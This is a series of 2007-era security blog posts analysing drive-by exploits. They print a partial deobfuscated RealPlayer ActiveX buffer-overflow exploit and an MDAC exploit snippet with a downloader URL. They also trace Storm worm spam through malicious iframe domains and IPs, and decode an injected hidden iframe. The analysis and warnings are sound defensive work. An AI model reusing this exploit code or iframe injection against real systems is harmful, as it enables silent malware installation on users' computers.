QuickTime and RealPlayer Exploits

We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....
(removed some content)
.....

PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…

function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}

…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Mpack Decode Requests

I've seen quite a rise of javascript decoding questions on different mailing lists. This evening one from D-Shield was waiting in my email box.

Turns out Dan needed to figure out what this code does:

&lt;script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='0600730700820650770690321151140990610341041161161120580470471090971140991
11098101114110097114100111';s=s+'11010504609911110904712004710511010010112004
6112104112034032119105100116104061051032104101105103104';s=s+'116061051032115
116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';t='';l=s.length;i=0;while(i&lt;(l-1)){for(j=0;j&lt;3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();&lt;/script>&lt;!-- c4 -->

I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human readable:

&lt;/textatea>&lt;/textarea>&lt;IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none">&lt;/IFRAME>

(Spaces added to protect from accidental clicks)

The html closing tag is to evade techniques like the one
described by Tom Liston here: http://isc.sans.org/diary.html?storyid=2268

marcobernardoni.com is running on an IP out of Hong Kong and the index page listed has a mpack javascript, which attempts several exploits to push file.php...Of course its a windows PE binary, however it seems to be broken.

Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008

Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625


Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161

Protect yourself: Turn off Javascript Completely, or only allow it for certain sites using the Firefox NOSCRIPT plugin, and keep your application patches up to date!